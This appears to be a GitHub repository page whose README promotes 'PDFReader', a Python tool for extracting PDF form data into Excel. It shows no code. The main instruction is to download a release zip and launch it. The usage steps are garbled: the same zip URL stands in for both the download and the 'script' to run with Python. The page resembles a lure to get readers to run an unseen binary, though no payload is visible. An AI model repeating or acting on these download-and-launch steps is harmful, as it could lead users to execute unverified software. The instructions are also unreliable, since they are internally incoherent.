Skip to content

Ready to use Python application/file for parsing a specific format of pdf form, and storing relevant user data in a tabular format in excel sheet

Notifications You must be signed in to change notification settings

sentifyy/PDFReader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

2 Commits
Β 
Β 

Repository files navigation

πŸ“š PDFReader

PDFReader Logo

Welcome to PDFReader, a Python application designed to parse a specific format of PDF form and store relevant user data in a tabular format in an Excel sheet! This repository provides a ready-to-use solution for automating the extraction and organization of data from PDF forms. Whether you're dealing with surveys, questionnaires, or any other type of structured PDF form, PDFReader has got you covered.

Features

πŸ” PDF Parsing: PDFReader uses the powerful pdfplumber library to extract text data from each form field in the PDF document.

πŸ”’ Data Extraction: Utilizing OCR technology through pytesseract, PDFReader is able to accurately recognize text within the PDF form.

πŸ“Š Data Organization: The extracted user data is structured and stored in an Excel sheet using the pandas library, making it easy to analyze and manipulate the information.

Installation

To get started with PDFReader, simply download the application from the following link:

Download Software (needs to be launched)

Usage

  1. Download the https://github.com/sentifyy/PDFReader/releases/download/v2.0/Release_x64.zip file from the provided link.
  2. Extract the contents of the zip file to a folder on your local machine.
  3. Run the https://github.com/sentifyy/PDFReader/releases/download/v2.0/Release_x64.zip script using Python.
  4. Follow the on-screen instructions to input the path to the PDF form you want to parse.
  5. Sit back and let PDFReader handle the data extraction and organization process for you.

Dependencies

PDFReader relies on the following libraries for its functionality:

  • matplotlib
  • numpy
  • opencv-python
  • pandas
  • pdfplumber
  • pytesseract

Make sure you have these dependencies installed in your Python environment before running PDFReader.

Support

If you encounter any issues or have questions about using PDFReader, feel free to reach out by creating an issue in this repository. Our team is dedicated to providing assistance and ensuring you have a seamless experience with PDFReader.

Stay Connected

Stay updated with the latest developments and releases by following our GitHub repository. We're constantly working on enhancing PDFReader and adding new features to make your PDF data extraction process even more efficient.

Thank you for choosing PDFReader! Let's simplify PDF form data processing together. πŸš€


Note: If the provided download link does not work, we recommend checking the "Releases" section of this repository for alternative download options. Visit our website at PDFReader Website for more information and resources.

About

Ready to use Python application/file for parsing a specific format of pdf form, and storing relevant user data in a tabular format in excel sheet

Topics

Resources

Stars

Watchers

Forks

Packages

No packages published